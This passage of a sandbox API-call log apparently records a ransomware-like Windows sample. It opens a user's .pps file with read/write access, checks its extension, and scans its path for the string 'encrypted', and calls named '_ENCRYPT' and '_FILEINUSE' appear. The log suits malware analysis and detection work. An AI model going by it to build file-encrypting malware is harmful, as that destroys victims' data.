lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0034.405] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0034.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0034.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0034.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0034.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0034.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0034.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0034.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0034.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0034.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0034.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0034.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0034.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0034.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0034.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0034.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0034.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0034.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0034.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0034.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0034.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0034.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0034.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0034.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0034.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0034.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0034.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0034.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0034.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0034.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0034.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0034.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0034.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0034.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0034.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0034.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0034.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0034.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0034.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0034.406] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0034.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0034.406] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0034.406] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0034.406] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0034.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0034.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0034.406] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0034.406] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0034.406] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0034.406] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\hdwgqzq\\cjzms2vlntpb5-vcp3um.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0034.406] FreeLibrary (hLibModule=0x76e10000) returned 1 [0034.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0034.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0034.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0034.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0034.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0034.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0034.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0034.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0034.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0034.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0034.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0034.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0034.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0034.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0034.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0034.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0034.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0034.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0034.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0034.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0034.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0034.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0034.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0034.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0034.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0034.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0034.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0034.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0034.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0034.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0034.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0034.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0034.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0034.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0034.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0034.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0034.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0034.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0034.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0034.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0034.407] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0034.407] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0034.408] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0034.408] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0034.408] FreeLibrary (hLibModule=0x76e10000) returned 1 [0034.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0034.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0034.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0034.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0034.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0034.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0034.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0034.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0034.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0034.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0034.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0034.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0034.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0034.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0034.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0034.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0034.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0034.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0034.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0034.408] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0034.408] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0034.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0034.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0034.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0034.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0034.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0034.408] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0034.408] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0034.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0034.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0034.409] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.409] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0034.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0034.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0034.409] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0034.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.409] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pps", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0034.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0034.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0034.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0034.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0034.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0034.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0034.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0034.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0034.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0034.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0034.409] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.409] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.409] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.409] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x180d77d0, ftCreationTime.dwHighDateTime=0x1d5bd8a, ftLastAccessTime.dwLowDateTime=0x764685a0, ftLastAccessTime.dwHighDateTime=0x1d5b8f1, ftLastWriteTime.dwLowDateTime=0x764685a0, ftLastWriteTime.dwHighDateTime=0x1d5b8f1, nFileSizeHigh=0x0, nFileSizeLow=0x8e5a, dwReserved0=0x0, dwReserved1=0x777648, cFileName="cJZMs2vLnTpB5-vCp3UM.pps", cAlternateFileName="CJZMS2~1.PPS")) returned 0x7c20c0 [0034.409] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0034.409] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0034.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0034.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0034.410] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.410] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x180d77d0, ftCreationTime.dwHighDateTime=0x1d5bd8a, ftLastAccessTime.dwLowDateTime=0x764685a0, ftLastAccessTime.dwHighDateTime=0x1d5b8f1, ftLastWriteTime.dwLowDateTime=0x764685a0, ftLastWriteTime.dwHighDateTime=0x1d5b8f1, nFileSizeHigh=0x0, nFileSizeLow=0x8e5a, dwReserved0=0x0, dwReserved1=0x777648, cFileName="cJZMs2vLnTpB5-vCp3UM.pps", cAlternateFileName="CJZMS2~1.PPS")) returned 0x7c20c0 [0034.410] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0034.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0034.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0034.410] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0034.410] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\cJZMs2vLnTpB5-vCp3UM.pps\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.410] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS 